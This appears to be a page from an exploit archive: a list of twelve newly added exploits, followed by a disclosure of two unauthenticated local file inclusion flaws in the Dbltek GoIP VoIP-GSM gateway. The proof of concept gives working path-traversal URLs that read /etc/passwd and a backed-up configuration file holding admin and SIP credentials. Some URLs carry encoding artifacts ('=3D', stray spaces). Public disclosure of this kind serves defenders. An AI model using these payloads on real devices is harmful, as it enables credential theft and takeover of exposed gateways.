
12 changes to exploits/shellcodes HMA VPN 5.3 - Unquoted Service Path Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) Cab Management System 1.0 - 'id' SQLi (Authenticated) Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated) Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated) Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection Thinfinity VirtualUI 2.5.26.2 - Information Disclosure WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated) FileCloud 21.2 - Cross-Site Request Forgery (CSRF) Dbltek GoIP - Local File Inclusion
28 lines
No EOL
1.4 KiB
Text
28 lines
No EOL
1.4 KiB
Text
# Exploit Title: Dbltek GoIP - Local File Inclusion
|
|
# Date: 20.02.2022
|
|
# Exploit Author: Valtteri Lehtinen & Lassi Korhonen
|
|
# Vendor Homepage: http://en.dbltek.com/index.html
|
|
# Software Link: -
|
|
# Version: GHSFVT-1.1-67-5 (firmware version)
|
|
# Tested on: Target is an IoT device
|
|
|
|
# Exploit summary
|
|
Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP.
|
|
The device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities.
|
|
|
|
Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up.
|
|
|
|
It is probable that also other models and versions of Dbltek GoIP devices are affected.
|
|
|
|
Writeup: https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
|
|
|
|
# Proof of Concept
|
|
Assuming the device is available on IP 192.168.9.1.
|
|
|
|
Download /etc/passwd
|
|
http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd
|
|
http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd
|
|
|
|
Download device configuration file from /tmp/config.dat (requires that the configuration file has been backed up)
|
|
http://192.168.9.1/default/en_US/frame.html?content=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat
|
|
http://192.168.9.1/default/en_US/frame.A100.html?sidebar=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat |